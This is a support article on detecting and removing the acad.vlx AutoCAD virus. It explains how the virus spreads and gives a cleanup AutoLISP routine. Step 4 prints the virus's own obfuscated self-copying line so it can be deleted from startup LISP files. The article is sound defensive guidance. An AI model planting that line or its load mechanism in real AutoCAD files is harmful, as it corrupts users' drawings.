How to detect and remove the Acad.vlx virus

Solution


This is not an actual AutoCAD file provided by Autodesk. When the malicious acad.vlx file is loaded in AutoCAD, it corrupts the drawing, which may result in a Missing Language Pack dialog box displaying when you save and reopen the drawing.

The acad.vlx file creates a copy of itself in the Help folder (for example, C:\Program Files\AutoCAD 20xx\Help\logo.gif). Several other files are also modified and the ACADLSPASDOC system variable is set to 1, allowing the acad.vlx file to be loaded into other opened drawings, thereby corrupting them.

The cleanup process outlined below detects and deletes any acad.vlx file before AutoCAD attempts to load it, preventing the spread of the virus.

To prevent additional file corruptions


You must be a system administrator on your Microsoft® Windows® operating system to complete this process.
  1. In your product installation folder, locate the Support folder (for example, C:\Program Files\AutoCAD 20xx\Support).

  2. In the Support folder, double-click the acad20xx.lsp file (for example, the acad20xx.lsp file). Add the code below to the file. AutoCAD will detect and delete the acad.vlx and logo.gif files.

    (defun cleanvirus( / lspfiles lspfile x)
    (setq lspfiles '("acad.vlx" "logo.gif"))
    (foreach lspfile lspfiles
    (while (setq x (findfile lspfile))
    (progn
    (vl-file-delete x)
    (princ "\nDeleted file ")
    (princ x)
    );progn
    );while
    );foreach
    )
    (cleanvirus)
  3. Open each of the following files:
    • C:\Program Files\AutoCAD 20xx\Express\acetauto.lsp
    • C:\Program Files\AutoCAD 20xx\Support\ai_utils.lsp
    • ROAMABLEROOTPREFIX\Support\acad.mnl
      Note: Replace ROAMABLEROOTPREFIX with the value returned by the ROAMABLEROOTPREFIX system variable.
  4. If present, delete the following line of code:

    (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))

  5. Save each file.